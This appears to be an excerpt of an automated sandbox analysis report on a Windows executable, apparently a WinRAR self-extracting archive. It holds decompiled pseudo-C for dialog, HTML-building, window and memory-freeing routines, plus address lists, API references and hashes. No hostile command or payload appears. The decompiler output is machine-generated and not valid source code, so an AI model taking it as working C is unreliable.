                												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
                												E00CB9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
                												__ebp - 0xbc8c = E00CB9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
                												__eflags =  *(__ebp - 0xcc8c);
                												if( *(__ebp - 0xcc8c) != 0) {
                													_push(__edi);
                													__eax = __ebp - 0xcc8c;
                													_push(__ebp - 0xcc8c);
                													_push(5);
                													_push(0x1000);
                													__eax =  *0xcddef8();
                												}
                												goto L164;
                											}
                											goto L159;
                										}
                									}
                								case 0xb:
                									L162:
                									__eflags = __ebx - 7;
                									if(__ebx == 7) {
                										 *0xce9600 = 1;
                									}
                									goto L164;
                								case 0xc:
                									L83:
                									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                									__eax = E00CC59C0( *(__ebp - 0x5c84) & 0x0000ffff);
                									__eflags = __eax - 0x46;
                									if(__eax == 0x46) {
                										 *0xce75d4 = 1;
                									} else {
                										__eflags = __eax - 0x55;
                										if(__eax == 0x55) {
                											 *0xce75d5 = 1;
                										} else {
                											__eax = 0;
                											 *0xce75d4 = __al;
                											 *0xce75d5 = __al;
                										}
                									}
                									goto L164;
                								case 0xd:
                									L93:
                									 *0xcfde21 = 1;
                									__eax = __eax + 0xcfde21;
                									_t104 = __esi + 0x39;
                									 *_t104 =  *(__esi + 0x39) + __esp;
                									__eflags =  *_t104;
                									__ebp = 0xffffa37c;
                									if( *_t104 != 0) {
                										_t106 = __ebp - 0x5c84; // 0xffff46f8
                										__eax = _t106;
                										_push(_t106);
                										 *0xcdd5fc = E00CB13FC();
                									}
                									goto L164;
                							}
                							L2:
                							_t210 = E00CB9E24(_t210, _t279);
                							_t279 = _t279 + 0x2000;
                							_t277 = _t277 - 1;
                							if(_t277 != 0) {
                								goto L2;
                							} else {
                								_t280 = _t277;
                								goto L4;
                							}
                						}
                						L165:
                						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
                						return _t209;
                					}
                					L100:
                					__eflags =  *0xcf5d02;
                					if( *0xcf5d02 != 0) {
                						goto L164;
                					}
                					L101:
                					__eax = 0;
                					 *(__ebp - 0x143c) = __ax;
                					__eax = __ebp - 0x5c84;
                					_push(__ebp - 0x5c84);
                					__eax = E00CC0BB8(__ecx);
                					_pop(__ecx);
                					__ecx = 0x2c;
                					__eflags = __eax;
                					if(__eax != 0) {
                						L108:
                						__eflags =  *(__ebp - 0x143c);
                						if( *(__ebp - 0x143c) == 0) {
                							__ebp - 0x1bc8c = __ebp - 0x5c84;
                							E00CAFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
                							__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
                						}
                						__ebp - 0x5c84 = E00CB9C4F(__ebp - 0x5c84);
                						__eax = 0;
                						 *(__ebp - 0x4c84) = __ax;
                						__ebp - 0x143c = __ebp - 0x5c84;
                						__eax = E00CB9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
                						__eflags = __eax - 6;
                						if(__eax == 6) {
                							goto L164;
                						} else {
                							L111:
                							__eax = 0;
                							__eflags = 0;
                							 *0xce75d7 = 1;
                							 *0xce85fa = __ax;
                							__eax = EndDialog( *(__ebp + 8), 1);
                							goto L112;
                						}
                					}
                					L102:
                					__esi = 0;
                					__eflags =  *(__ebp - 0x5c84) - __dx;
                					if( *(__ebp - 0x5c84) == __dx) {
                						goto L108;
                					}
                					L103:
                					__ecx = 0;
                					__eax = __ebp - 0x5c84;
                					while(1) {
                						L104:
                						__eflags =  *__eax - 0x40;
                						if( *__eax == 0x40) {
                							break;
                						}
                						L105:
                						__esi =  &(__esi->i);
                						__eax = __ebp - 0x5c84;
                						__ecx = __esi + __esi;
                						__eax = __ebp - 0x5c84 + __ecx;
                						__eflags =  *__eax - __dx;
                						if( *__eax != __dx) {
                							continue;
                						}
                						L106:
                						goto L108;
                					}
                					L107:
                					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
                					__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
                					__eax = 0;
                					__eflags = 0;
                					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
                					goto L108;
                					L112:
                					__eflags = _t263 - 7;
                					if(_t263 == 7) {
                						__eflags =  *0xce95fc;
                						if( *0xce95fc == 0) {
                							 *0xce95fc = 2;
                						}
                						 *0xce85f8 = 1;
                					}
                					goto L164;
                				}
                			}










                0x00000000
                0x00cbb800
                0x00cbb800
                0x00cbb802
                0x00cbb812
                0x00cbb812
                0x00000000
                0x00000000
                0x00cbb81d
                0x00cbb81d
                0x00cbb81f
                0x00000000
                0x00000000
                0x00cbb825
                0x00cbb825
                0x00cbb82c
                0x00000000
                0x00000000
                0x00cbb832
                0x00cbb832
                0x00cbb834
                0x00cbb83a
                0x00cbb83c
                0x00cbb843
                0x00cbb844
                0x00cbb84b
                0x00cbb84d
                0x00cbb84d
                0x00cbb854
                0x00cbb859
                0x00cbb85f
                0x00cbb861
                0x00000000
                0x00cbb867
                0x00cbb867
                0x00cbb867
                0x00cbb86a
                0x00cbb86c
                0x00cbb86d
                0x00cbb870
                0x00cbb899
                0x00cbb899
                0x00cbb89c
                0x00cbb981
                0x00cbb98a
                0x00cbb98f
                0x00cbb98f
                0x00cbb991
                0x00cbb991
                0x00cbb993
                0x00cbb995
                0x00cbb99c
                0x00cbb9a1
                0x00cbb9a2
                0x00cbb9a3
                0x00cbb9a5
                0x00cbb9a7
                0x00cbb9ab
                0x00cbb9ad
                0x00cbb9ad
                0x00cbb9af
                0x00cbb9af
                0x00cbb9ab
                0x00cbb9b3
                0x00cbb9b9
                0x00cbb9c6
                0x00cbb9cd
                0x00cbb9dd
                0x00cbb9e7
                0x00cbb9ef
                0x00cbb9fb
                0x00cbb9fd
                0x00cbba05
                0x00cbba0a
                0x00cbba0b
                0x00cbba0c
                0x00cbba0e
                0x00cbba1b
                0x00cbba24
                0x00cbba24
                0x00000000
                0x00cbba0e
                0x00cbb8a2
                0x00cbb8a2
                0x00cbb8a5
                0x00cbb8b2
                0x00cbb8b2
                0x00cbb8b5
                0x00cbb8b7
                0x00cbb8b8
                0x00cbb8ba
                0x00cbb8bb
                0x00cbb8c0
                0x00cbb8c5
                0x00cbb8cb
                0x00cbb8cd
                0x00cbb8cf
                0x00cbb8d2
                0x00cbb8d9
                0x00cbb8da
                0x00cbb8e0
                0x00cbb8e1
                0x00cbb8e4
                0x00cbb8e5
                0x00cbb8e6
                0x00cbb8eb
                0x00cbb8ee
                0x00cbb8f4
                0x00cbb8fd
                0x00cbb900
                0x00cbb905
                0x00cbb907
                0x00cbb909
                0x00cbb90b
                0x00cbb90b
                0x00cbb90d
                0x00cbb90d
                0x00cbb90f
                0x00cbb90f
                0x00cbb917
                0x00cbb91e
                0x00cbb920
                0x00cbb927
                0x00cbb92d
                0x00cbb92f
                0x00cbb930
                0x00cbb938
                0x00cbb947
                0x00cbb947
                0x00cbb938
                0x00cbb952
                0x00cbb954
                0x00cbb963
                0x00cbb969
                0x00cbb96f
                0x00cbb97a
                0x00cbb97a
                0x00000000
                0x00cbb96f
                0x00cbb8a7
                0x00cbb8a7
                0x00cbb8ac
                0x00000000
                0x00000000
                0x00000000
                0x00cbb8ac
                0x00cbb872
                0x00cbb872
                0x00cbb876
                0x00000000
                0x00000000
                0x00cbb878
                0x00cbb878
                0x00cbb87b
                0x00cbb87d
                0x00cbb880
                0x00000000
                0x00000000
                0x00cbb886
                0x00cbb88f
                0x00000000
                0x00cbb88f
                0x00000000
                0x00cbba2b
                0x00cbba2b
                0x00cbba2c
                0x00cbba31
                0x00cbba33
                0x00cbba36
                0x00cbba36
                0x00000000
                0x00cbba6c
                0x00cbba6c
                0x00cbba73
                0x00cbba75
                0x00cbba75
                0x00cbba77
                0x00cbbaa6
                0x00cbbaa6
                0x00cbbaac
                0x00000000
                0x00cbbaac
                0x00cbba79
                0x00cbba79
                0x00cbba79
                0x00cbba7c
                0x00cbba95
                0x00cbba95
                0x00cbba9b
                0x00cbba9b
                0x00000000
                0x00cbba9b
                0x00cbba7e
                0x00cbba7e
                0x00cbba7e
                0x00cbba81
                0x00000000
                0x00000000
                0x00cbba83
                0x00cbba83
                0x00cbba83
                0x00cbba86
                0x00000000
                0x00000000
                0x00cbba8c
                0x00cbba8c
                0x00000000
                0x00000000
                0x00cbbaf9
                0x00cbbaf9
                0x00cbbafc
                0x00000000
                0x00000000
                0x00cbbafe
                0x00cbbafe
                0x00cbbb0a
                0x00cbbb0f
                0x00cbbb10
                0x00cbbb11
                0x00cbbb13
                0x00000000
                0x00000000
                0x00cbbb15
                0x00cbbb15
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cbbd07
                0x00cbbd07
                0x00cbbd0a
                0x00cbbd0c
                0x00cbbd13
                0x00cbbd15
                0x00cbbd1b
                0x00cbbd1c
                0x00cbbd21
                0x00cbbd22
                0x00cbbd22
                0x00cbbd27
                0x00cbbd2a
                0x00cbbd30
                0x00cbbd30
                0x00cbbd35
                0x00000000
                0x00000000
                0x00cbbd41
                0x00cbbd41
                0x00cbbd44
                0x00cbbb25
                0x00cbbb25
                0x00000000
                0x00cbbb25
                0x00cbbd4a
                0x00cbbd4a
                0x00cbbb16
                0x00cbbb16
                0x00cbbb1c
                0x00cbbb1d
                0x00cbbb20
                0x00000000
                0x00000000
                0x00cbbd51
                0x00cbbd51
                0x00cbbd54
                0x00000000
                0x00000000
                0x00cbbd5a
                0x00cbbd5a
                0x00cbbd5c
                0x00cbbd63
                0x00cbbd6b
                0x00cbbd71
                0x00cbbd76
                0x00cbbd79
                0x00cbbdae
                0x00cbbdb3
                0x00cbbdb9
                0x00cbbdba
                0x00cbbdbf
                0x00cbbd7b
                0x00cbbd7b
                0x00cbbd7e
                0x00cbbd84
                0x00cbbd9a
                0x00cbbd9f
                0x00cbbda0
                0x00cbbda5
                0x00cbbd86
                0x00cbbd86
                0x00cbbd8b
                0x00cbbd8c
                0x00cbbd91
                0x00cbbd91
                0x00cbbd84
                0x00cbbdc6
                0x00cbbdc8
                0x00cbbdcf
                0x00cbbddd
                0x00cbbde4
                0x00cbbde9
                0x00cbbdea
                0x00cbbdeb
                0x00cbbded
                0x00cbbdee
                0x00cbbdf5
                0x00cbbe3e
                0x00cbbe45
                0x00cbbe4a
                0x00cbbe4c
                0x00000000
                0x00000000
                0x00cbbe52
                0x00cbbe52
                0x00cbbe54
                0x00cbbe5a
                0x00cbbe61
                0x00000000
                0x00000000
                0x00cbbe63
                0x00cbbe63
                0x00cbbe65
                0x00cbbe66
                0x00cbbe66
                0x00cbbe66
                0x00cbbe69
                0x00cbbe6c
                0x00cbbe76
                0x00cbbe76
                0x00cbbe78
                0x00cbbe7a
                0x00cbbe84
                0x00cbbe89
                0x00cbbe8b
                0x00cbbec9
                0x00cbbec9
                0x00cbbecc
                0x00cbbecc
                0x00cbbece
                0x00cbbecf
                0x00cbbecf
                0x00000000
                0x00cbbecf
                0x00cbbe8d
                0x00cbbe8d
                0x00cbbe8f
                0x00cbbe90
                0x00cbbe92
                0x00cbbe95
                0x00cbbeaa
                0x00cbbeaa
                0x00cbbeac
                0x00cbbead
                0x00cbbead
                0x00cbbead
                0x00cbbeb0
                0x00cbbeb0
                0x00cbbeb5
                0x00cbbeb6
                0x00cbbebc
                0x00cbbebc
                0x00cbbebd
                0x00cbbec2
                0x00cbbec3
                0x00cbbec4
                0x00000000
                0x00cbbec4
                0x00cbbe97
                0x00cbbe97
                0x00cbbe9e
                0x00cbbea1
                0x00cbbea2
                0x00000000
                0x00cbbea2
                0x00cbbe6e
                0x00cbbe6e
                0x00cbbe70
                0x00cbbe71
                0x00cbbe74
                0x00000000
                0x00000000
                0x00000000
                0x00cbbed1
                0x00cbbed1
                0x00cbbed4
                0x00cbbed4
                0x00cbbed9
                0x00cbbedb
                0x00cbbedd
                0x00cbbedd
                0x00cbbedf
                0x00cbbedf
                0x00000000
                0x00cbbdf7
                0x00cbbdf7
                0x00cbbdfe
                0x00cbbe0a
                0x00cbbe10
                0x00cbbe11
                0x00cbbe12
                0x00cbbe17
                0x00cbbe1a
                0x00cbbe1c
                0x00cbbe22
                0x00cbbe24
                0x00cbbe32
                0x00cbbe37
                0x00cbbe38
                0x00cbbe38
                0x00cbbee2
                0x00cbbee2
                0x00cbbeea
                0x00cbbeef
                0x00cbbef1
                0x00cbbef2
                0x00cbbef8
                0x00cbbef9
                0x00cbbeff
                0x00cbbf00
                0x00cbbf00
                0x00cbbf05
                0x00cbbf06
                0x00cbbf0c
                0x00cbbf0d
                0x00cbbf13
                0x00cbbf14
                0x00cbbf19
                0x00cbbf21
                0x00cbbf2d
                0x00cbbf2d
                0x00cbbf3a
                0x00cbbf3f
                0x00cbbf47
                0x00cbbf51
                0x00cbbf5e
                0x00cbbf65
                0x00cbbf65
                0x00cbbf71
                0x00cbbf78
                0x00cbbf7d
                0x00cbbf85
                0x00cbbf8b
                0x00cbbf8c
                0x00cbbf8d
                0x00cbbf8f
                0x00cbbf8f
                0x00cbbfa4
                0x00cbbfa9
                0x00cbbfb5
                0x00cbbfb7
                0x00cbbfc8
                0x00cbbfd5
                0x00000000
                0x00cbbfb9
                0x00cbbfb9
                0x00cbbfc4
                0x00cbbfc6
                0x00cbbfda
                0x00cbbfda
                0x00cbbfdc
                0x00cbbfe2
                0x00cbbfe8
                0x00cbbff6
                0x00cbbffb
                0x00cbbffc
                0x00cbc004
                0x00cbc009
                0x00cbc010
                0x00cbc016
                0x00cbc018
                0x00cbc01e
                0x00cbc024
                0x00cbc026
                0x00cbc02f
                0x00cbc032
                0x00cbc034
                0x00cbc03d
                0x00cbc040
                0x00cbc046
                0x00cbc049
                0x00cbc052
                0x00cbc061
                0x00cbc066
                0x00cbc06e
                0x00cbc070
                0x00cbc071
                0x00cbc077
                0x00cbc078
                0x00cbc07a
                0x00cbc07f
                0x00cbc07f
                0x00000000
                0x00cbc06e
                0x00000000
                0x00cbbfc6
                0x00cbbfb7
                0x00000000
                0x00cbc087
                0x00cbc087
                0x00cbc08a
                0x00cbc08c
                0x00cbc08c
                0x00000000
                0x00000000
                0x00cbbab8
                0x00cbbab8
                0x00cbbac0
                0x00cbbac6
                0x00cbbac9
                0x00cbbaed
                0x00cbbacb
                0x00cbbacb
                0x00cbbace
                0x00cbbae1
                0x00cbbad0
                0x00cbbad0
                0x00cbbad2
                0x00cbbad7
                0x00cbbad7
                0x00cbbace
                0x00000000
                0x00000000
                0x00cbbb31
                0x00cbbb31
                0x00cbbb32
                0x00cbbb37
                0x00cbbb37
                0x00cbbb37
                0x00cbbb3a
                0x00cbbb3f
                0x00cbbb45
                0x00cbbb45
                0x00cbbb4b
                0x00cbbb51
                0x00cbbb51
                0x00000000
                0x00000000
                0x00cbb52a
                0x00cbb52c
                0x00cbb531
                0x00cbb537
                0x00cbb53a
                0x00000000
                0x00cbb53c
                0x00cbb53c
                0x00000000
                0x00cbb53c
                0x00cbb53a
                0x00cbc0c4
                0x00cbc0ca
                0x00cbc0d4
                0x00cbc0d4
                0x00cbbbd9
                0x00cbbbd9
                0x00cbbbe0
                0x00000000
                0x00000000
                0x00cbbbe6
                0x00cbbbe6
                0x00cbbbe8
                0x00cbbbef
                0x00cbbbf7
                0x00cbbbf8
                0x00cbbbfd
                0x00cbbbfe
                0x00cbbbff
                0x00cbbc01
                0x00cbbc55
                0x00cbbc55
                0x00cbbc5d
                0x00cbbc6b
                0x00cbbc7c
                0x00cbbc8a
                0x00cbbc8a
                0x00cbbc96
                0x00cbbc9b
                0x00cbbc9d
                0x00cbbcad
                0x00cbbcb7
                0x00cbbcbc
                0x00cbbcbf
                0x00000000
                0x00cbbcc5
                0x00cbbcc5
                0x00cbbcca
                0x00cbbcca
                0x00cbbccc
                0x00cbbcd3
                0x00cbbcd9
                0x00000000
                0x00cbbcd9
                0x00cbbcbf
                0x00cbbc03
                0x00cbbc05
                0x00cbbc07
                0x00cbbc0e
                0x00000000
                0x00000000
                0x00cbbc10
                0x00cbbc10
                0x00cbbc12
                0x00cbbc18
                0x00cbbc18
                0x00cbbc18
                0x00cbbc1c
                0x00000000
                0x00000000
                0x00cbbc1e
                0x00cbbc1e
                0x00cbbc1f
                0x00cbbc25
                0x00cbbc28
                0x00cbbc2a
                0x00cbbc2d
                0x00000000
                0x00000000
                0x00cbbc2f
                0x00000000
                0x00cbbc2f
                0x00cbbc31
                0x00cbbc3c
                0x00cbbc46
                0x00cbbc4b
                0x00cbbc4b
                0x00cbbc4d
                0x00000000
                0x00cbbcdf
                0x00cbbcdf
                0x00cbbce2
                0x00cbbce8
                0x00cbbcef
                0x00cbbcf1
                0x00cbbcf1
                0x00cbbcfb
                0x00cbbcfb
                0x00000000
                0x00cbbce2

                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 00CBBB71
                • _swprintf.LIBCMT ref: 00CBBBA5
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • SetDlgItemTextW.USER32(?,00000066,00CE85FA), ref: 00CBBBC5
                • _wcschr.LIBVCRUNTIME ref: 00CBBBF8
                • EndDialog.USER32(?,00000001), ref: 00CBBCD9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: 1d50e084bf46c0efa418ca8dc5addf089f1c41a404fe06ec2f21ee98cff8e40d
                • Instruction ID: fd3ecfdf03baa769e90e524fc3f40986cbbe6acc1e1e45a56bd63038c997261d
                • Opcode Fuzzy Hash: 1d50e084bf46c0efa418ca8dc5addf089f1c41a404fe06ec2f21ee98cff8e40d
                • Instruction Fuzzy Hash: F2415C7294025AAEEF25DB64DD85FEE7BB8EB04304F0040A6F519E6051EFB09F889F51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00CB88BF(void* __edx) {
                				void* __ecx;
                				void* _t20;
                				short* _t24;
                				void* _t28;
                				signed int _t29;
                				intOrPtr _t31;
                				intOrPtr* _t38;
                				void* _t44;
                				void* _t58;
                				intOrPtr* _t60;
                				short* _t62;
                				short* _t64;
                				intOrPtr* _t67;
                				long _t69;
                				void* _t71;
                				void* _t72;
                
                				_t58 = __edx;
                				_t43 = _t44;
                				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
                					return _t20;
                				}
                				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
                				_t60 =  *((intOrPtr*)(_t71 + 0x18));
                				 *((char*)(_t71 + 0x1c)) = E00CB87A5(_t60);
                				_push(0x200 + E00CC2B33(_t60) * 2);
                				_t24 = E00CC2B53(_t44);
                				_t64 = _t24;
                				if(_t64 == 0) {
                					L16:
                					return _t24;
                				}
                				E00CC4D7E(_t64, L"<html>");
                				E00CC66ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                				E00CC66ED(_t64, L"utf-8\"></head>");
                				_t72 = _t71 + 0x18;
                				_t67 = _t60;
                				_t28 = 0x20;
                				if( *_t60 != _t28) {
                					L4:
                					_t29 = E00CB1432(_t76, _t67, L"<html>", 6);
                					asm("sbb al, al");
                					_t31 =  ~_t29 + 1;
                					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
                					if(_t31 != 0) {
                						_t60 = _t67 + 0xc;
                					}
                					E00CC66ED(_t64, _t60);
                					if( *((char*)(_t72 + 0x1c)) == 0) {
                						E00CC66ED(_t64, L"</html>");
                					}
                					_t79 =  *((char*)(_t72 + 0x1c));
                					if( *((char*)(_t72 + 0x1c)) == 0) {
                						_push(_t64);
                						_t64 = E00CB8ACA(_t58, _t79);
                					}
                					_t69 = 9 + E00CC2B33(_t64) * 6;
                					_t62 = GlobalAlloc(0x40, _t69);
                					if(_t62 != 0) {
                						_t13 = _t62 + 3; // 0x3
                						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
                							 *_t62 = 0;
                						} else {
                							 *_t62 = 0xbbef;
                							 *((char*)(_t62 + 2)) = 0xbf;
                						}
                					}
                					L00CC2B4E(_t64);
                					_t24 =  *0xcddff8(_t62, 1, _t72 + 0x10);
                					if(_t24 >= 0) {
                						E00CB87DC( *((intOrPtr*)(_t43 + 0x10)));
                						_t38 =  *((intOrPtr*)(_t72 + 0xc));
                						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
                					}
                					goto L16;
                				} else {
                					goto L3;
                				}
                				do {
                					L3:
                					_t67 = _t67 + 2;
                					_t76 =  *_t67 - _t28;
                				} while ( *_t67 == _t28);
                				goto L4;
                			}




















                APIs
                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB87A0), ref: 00CB8994
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CB89B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AllocByteCharGlobalMultiWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 3286310052-4209811716
                • Opcode ID: e87c30c7c1b7d7f8c8be71fb53eaac95b743ab19d2d4a9121ca12a64d649ea6e
                • Instruction ID: 44d6264d6f6288178adca9ae9896296139695f25d2572b3c7ff0aab5ba7a37ab
                • Opcode Fuzzy Hash: e87c30c7c1b7d7f8c8be71fb53eaac95b743ab19d2d4a9121ca12a64d649ea6e
                • Instruction Fuzzy Hash: 153101329043427EEB15AB60DC06FAFB79CDF41720F14851EF521961C2EF709A09D7A6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00CB8FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                				struct tagRECT _v16;
                				intOrPtr _v28;
                				intOrPtr _v36;
                				void* __ebx;
                				void* __edi;
                				intOrPtr _t32;
                				struct HWND__* _t43;
                				intOrPtr* _t51;
                				void* _t58;
                				WCHAR* _t65;
                				struct HWND__* _t66;
                
                				_t66 = _a8;
                				_t51 = __ecx;
                				 *(__ecx + 8) = _t66;
                				 *((char*)(__ecx + 0x26)) = _a20;
                				ShowWindow(_t66, 0);
                				E00CB8D3F(_t51, _a4);
                				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
                					L00CC2B4E( *((intOrPtr*)(_t51 + 0x1c)));
                				}
                				if(_a12 != 0) {
                					_push(_a12);
                					_t32 = E00CC668C(_t51, _t58);
                				} else {
                					_t32 = 0;
                				}
                				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
                				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
                				GetWindowRect(_t66,  &_v16);
                				 *0xcddf88(0,  *0xcddfd4(_t66,  &_v16, 2));
                				if( *(_t51 + 4) != 0) {
                					 *0xcddf90( *(_t51 + 4));
                				}
                				_t39 = _v36;
                				_t19 = _t39 + 1; // 0x1
                				_t43 =  *0xcddf98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xcddfd4(_t66, 0,  *_t51, _t51, _t58));
                				 *(_t51 + 4) = _t43;
                				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
                					__eflags = _t43;
                					if(_t43 != 0) {
                						ShowWindow(_t43, 5);
                						return  *0xcddf8c( *(_t51 + 4));
                					}
                				} else {
                					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
                						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
                						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
                							_t43 = E00CB8E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
                							_t65 = _t43;
                							if(_t65 != 0) {
                								ShowWindow(_t66, 5);
                								SetWindowTextW(_t66, _t65);
                								return L00CC2B4E(_t65);
                							}
                						}
                					}
                				}
                				return _t43;
                			}















                APIs
                • ShowWindow.USER32(?,00000000), ref: 00CB8FFF
                • GetWindowRect.USER32(?,00000000), ref: 00CB9044
                • ShowWindow.USER32(?,00000005,00000000), ref: 00CB90DB
                • SetWindowTextW.USER32(?,00000000), ref: 00CB90E3
                • ShowWindow.USER32(00000000,00000005), ref: 00CB90F9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: ca19f72df77665ebb269dfa1af1b5a7edee8b51a394988bf9ec54722d1ee082a
                • Instruction ID: 5ac71bef33245fc986b126357c45dc15558ee31642760cd35a4cc3d6907ad919
                • Opcode Fuzzy Hash: ca19f72df77665ebb269dfa1af1b5a7edee8b51a394988bf9ec54722d1ee082a
                • Instruction Fuzzy Hash: 2D31B031405310AFCB21AFA4DC8CF9FBBA8EF48711F00455AFA5B9A1A6CB31D940DB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CCB506(intOrPtr _a4) {
                				void* _t18;
                
                				_t45 = _a4;
                				if(_a4 != 0) {
                					E00CCB4CA(_t45, 7);
                					E00CCB4CA(_t45 + 0x1c, 7);
                					E00CCB4CA(_t45 + 0x38, 0xc);
                					E00CCB4CA(_t45 + 0x68, 0xc);
                					E00CCB4CA(_t45 + 0x98, 2);
                					E00CC7A50( *((intOrPtr*)(_t45 + 0xa0)));
                					E00CC7A50( *((intOrPtr*)(_t45 + 0xa4)));
                					E00CC7A50( *((intOrPtr*)(_t45 + 0xa8)));
                					E00CCB4CA(_t45 + 0xb4, 7);
                					E00CCB4CA(_t45 + 0xd0, 7);
                					E00CCB4CA(_t45 + 0xec, 0xc);
                					E00CCB4CA(_t45 + 0x11c, 0xc);
                					E00CCB4CA(_t45 + 0x14c, 2);
                					E00CC7A50( *((intOrPtr*)(_t45 + 0x154)));
                					E00CC7A50( *((intOrPtr*)(_t45 + 0x158)));
                					E00CC7A50( *((intOrPtr*)(_t45 + 0x15c)));
                					return E00CC7A50( *((intOrPtr*)(_t45 + 0x160)));
                				}
                				return _t18;
                			}

                APIs
                  • Part of subcall function 00CCB4CA: _free.LIBCMT ref: 00CCB4F3
                • _free.LIBCMT ref: 00CCB554
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CCB55F
                • _free.LIBCMT ref: 00CCB56A
                • _free.LIBCMT ref: 00CCB5BE
                • _free.LIBCMT ref: 00CCB5C9
                • _free.LIBCMT ref: 00CCB5D4
                • _free.LIBCMT ref: 00CCB5DF
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
